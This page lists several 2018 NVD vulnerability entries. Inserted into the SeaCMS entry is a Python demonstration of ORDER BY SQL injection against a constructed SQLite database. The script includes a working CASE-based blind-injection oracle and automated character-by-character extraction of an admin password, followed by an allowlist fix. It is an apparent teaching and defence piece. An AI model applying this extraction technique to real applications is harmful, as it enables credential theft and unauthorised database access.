Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database

CVE-2018-17141
PUBLISHED: 2018-09-21

HylaFAX 6.0.6 and HylaFAX+ 5.6.0 allow remote attackers to execute arbitrary code via a dial-in session that provides a FAX page with the JPEG bit enabled, which is mishandled in FaxModem::writeECMData() in the faxd/CopyQuality.c++ file.

CVE-2018-17173
PUBLISHED: 2018-09-21

LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.

CVE-2018-17174
PUBLISHED: 2018-09-21

A stack-based buffer overflow was discovered in the xtimor NMEA library (aka nmealib) 0.5.3. nmea_parse() in parser.c allows an attacker who supplies malformed NMEA data to cause a denial of service (or, in some contexts, arbitrary code execution) in a product that uses this library.

CVE-2018-16822
PUBLISHED: 2018-09-21

SeaCMS 6.64 allows SQL Injection via the upload/admin/admin_video.php order parameter.
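The SeaCMS entry names an "order" parameter, i.e. a sort column. That is the one place in a statement where prepared statements do not help, because ORDER BY takes an identifier or expression rather than a value, so developers tend to concatenate the request parameter into the query. The following script is an added illustration of that class, not SeaCMS code: the table, column and function names and the sample rows are constructed for the demonstration and run against an in-memory SQLite database. It shows a vulnerable sort-column sink, a CASE-based payload that turns the sort direction into a one-bit oracle for blind extraction, and the allowlist fix that rejects the same payload.

```python
"""Added example of an ORDER BY (sort-column) SQL injection.
Not SeaCMS code: schema, data and names are constructed for illustration."""
import sqlite3

# Hardened form maps the request value onto this fixed set of column names.
ALLOWED_ORDER_COLUMNS = {"id", "title", "created"}


def make_db() -> sqlite3.Connection:
    # Constructed sample data: a video table plus an admin table holding a
    # secret that an attacker wants to read through the injection.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE video (id INTEGER PRIMARY KEY, title TEXT, created TEXT);
        INSERT INTO video VALUES (1, 'alpha',   '2018-01-01');
        INSERT INTO video VALUES (2, 'bravo',   '2018-02-01');
        INSERT INTO video VALUES (3, 'charlie', '2018-03-01');
        CREATE TABLE admin (name TEXT, pass TEXT);
        INSERT INTO admin VALUES ('admin', 'hunter2');
    """)
    return conn


def list_videos_vulnerable(conn: sqlite3.Connection, order: str) -> list:
    """Vulnerable pattern: the sort column from the request is concatenated
    straight into the statement. A bound parameter cannot be used here, so
    parameterisation alone does not fix this sink."""
    sql = f"SELECT id, title FROM video ORDER BY {order}"
    return [row[0] for row in conn.execute(sql)]


def list_videos_hardened(conn: sqlite3.Connection, order: str) -> list:
    """Hardened pattern: only a known column name reaches the query text."""
    if order not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unsupported sort column: {order!r}")
    sql = f"SELECT id, title FROM video ORDER BY {order}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(condition: str) -> str:
    """Sort expression whose direction depends on `condition`: ascending by
    id when true, descending when false. The caller learns one bit per
    request from row order alone, with no error message needed."""
    return f"(CASE WHEN ({condition}) THEN id ELSE -id END)"


def leak_password_length(conn: sqlite3.Connection) -> int:
    """Blind extraction step 1: ask 'is length(pass) = n?' for each n."""
    for n in range(1, 33):
        cond = f"(SELECT length(pass) FROM admin) = {n}"
        if list_videos_vulnerable(conn, oracle_payload(cond)) == [1, 2, 3]:
            return n
    return -1


def leak_password(conn: sqlite3.Connection) -> str:
    """Blind extraction step 2: recover the secret one character at a time
    by comparing each position's code point against the printable range."""
    recovered = ""
    for pos in range(1, leak_password_length(conn) + 1):
        for code in range(32, 127):
            cond = f"unicode(substr((SELECT pass FROM admin), {pos}, 1)) = {code}"
            if list_videos_vulnerable(conn, oracle_payload(cond)) == [1, 2, 3]:
                recovered += chr(code)
                break
    return recovered


def hardened_rejects_payload(conn: sqlite3.Connection) -> bool:
    """The same oracle payload is refused by the allowlisted version."""
    try:
        list_videos_hardened(conn, oracle_payload("1=1"))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via sort order:", leak_password(db))
    print("hardened rejects payload:", hardened_rejects_payload(db))
```

The oracle needs nothing but the order of returned rows, which is why a sort parameter is a high-value sink even when the application suppresses database errors. Allowlisting column names (and, separately, the ASC/DESC direction) is the standard fix; mapping request values to internal identifiers through a dictionary works equally well.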

CVE-2018-16833
PUBLISHED: 2018-09-21

Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles" search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI.